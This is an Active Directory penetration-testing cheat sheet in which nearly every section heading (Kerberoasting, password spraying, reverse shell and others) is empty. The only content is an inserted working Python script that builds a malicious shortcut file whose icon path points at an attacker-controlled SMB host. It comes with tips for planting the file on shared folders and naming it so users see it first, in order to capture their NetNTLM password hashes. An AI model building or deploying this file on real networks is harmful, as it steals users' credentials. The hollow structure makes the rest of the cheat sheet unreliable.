Active Directory Cheat Sheet

Table of Contents

  1. SMB Enumeration

  2. User Enumeration

  3. LDAP/LAPS Enumeration

  4. Kerberos Attacks

  5. Credential Attacks

  6. BloodHound Collection

  7. File Transfer Methods

  8. Windows Post-Exploitation

  9. Privilege Escalation

  10. ADCS (Certificate Services)

  11. ACL Abuse

  12. Miscellaneous Tools

SMB Enumeration

SMB Share Listing

Always try multiple tools for listing shares:

Crawling Shares & Extracting Files

LNK File Attack (SMB Write Permission / NTLM Theft)
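Added example (not from the original cheat sheet): a pure-Python builder for the malicious .lnk used in this attack. The only thing the file needs is an IconLocation string pointing at a UNC path on the attacker host; when a user opens the share in Explorer, it tries to load the icon over SMB and authenticates, so the NetNTLM hash can be captured by a listener on that host (the listener side is not shown here). The attacker IP, share and file names below are placeholders.

```python
import struct

# Shell Link (.lnk) layout per MS-SHLLINK: 76-byte header, then StringData, then ExtraData.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_IDLIST = 0x01
HAS_LINK_INFO = 0x02
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
STRING_DATA_BEFORE_ICON = (0x04, 0x08, 0x10, 0x20)  # HasName, HasRelativePath, HasWorkingDir, HasArguments
SW_SHOWNORMAL = 1


def build_lnk(icon_unc_path: str) -> bytes:
    """Return the bytes of a minimal .lnk whose icon is loaded from icon_unc_path."""
    flags = HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack(
        "<I16sIIQQQIIIHHII",
        LNK_HEADER_SIZE, LNK_CLSID, flags,
        0,          # FileAttributes
        0, 0, 0,    # CreationTime, AccessTime, WriteTime (FILETIME, 0 = unset)
        0,          # FileSize
        0,          # IconIndex
        SW_SHOWNORMAL,
        0,          # HotKey
        0, 0, 0,    # Reserved1, Reserved2, Reserved3
    )
    # StringData: CountCharacters (chars, not bytes) + UTF-16LE string, no terminator
    string_data = struct.pack("<H", len(icon_unc_path)) + icon_unc_path.encode("utf-16-le")
    terminal_block = struct.pack("<I", 0)  # ExtraData ends with a 4-byte TerminalBlock
    return header + string_data + terminal_block


def parse_icon_location(data: bytes) -> str:
    """Read the IconLocation string back out of a .lnk (sanity check before dropping it on a share)."""
    size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a shell link file")
    if not flags & HAS_ICON_LOCATION:
        raise ValueError("link carries no IconLocation string")
    char_size = 2 if flags & IS_UNICODE else 1
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_IDLIST:            # IDListSize (2 bytes) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                     # LinkInfoSize includes itself
        off += struct.unpack_from("<I", data, off)[0]
    for bit in STRING_DATA_BEFORE_ICON:           # StringData structures appear in fixed order
        if flags & bit:
            off += 2 + struct.unpack_from("<H", data, off)[0] * char_size
    count = struct.unpack_from("<H", data, off)[0]
    raw = data[off + 2: off + 2 + count * char_size]
    return raw.decode("utf-16-le" if flags & IS_UNICODE else "cp1252")


if __name__ == "__main__":
    # Placeholder attacker host and share; drop the result into any share users browse.
    lnk = build_lnk(r"\\10.10.14.5\share\icon.ico")
    with open("@readme.lnk", "wb") as f:   # leading '@' sorts the file to the top of the listing
        f.write(lnk)
    print(parse_icon_location(lnk))
```

The file does not need a valid target: Explorer resolves the icon path while rendering the directory listing, so the user only has to open the folder, not the shortcut.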

SMB Server (File Transfer)

User Enumeration

Username Enumeration via RID Brute

Impacket Tools

Kerbrute (Kerberos User Enumeration)

Nmap Kerberos Enumeration

Other Enumeration Tools

Extract Usernames from Website

Useful Wordlists

  • /usr/share/seclists/Usernames/Names/names.txt

  • /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

LDAP/LAPS Enumeration

Basic LDAP Enumeration

Authenticated LDAP Searches

LAPS (Local Administrator Password Solution)

Query LAPS passwords for managed computers:

Get GPP Passwords

NetExec LDAP Modules

Kerberos Attacks

Request TGT & Usage

Kerberoasting

From Compromised Service Account (Rubeus)

AS-REP Roasting

Clock Skew Fix

Credential Attacks

Password Spraying

SSH Key Spray

Hash Cracking

BloodHound Collection

bloodhound-python

Rusthound

File Transfer Methods

SMB Server (Covered in SMB section above)

PowerShell Download

Perl Download

Base64 Exfiltration

Finding SID

DNS Enumeration

Stable Reverse Shell Script
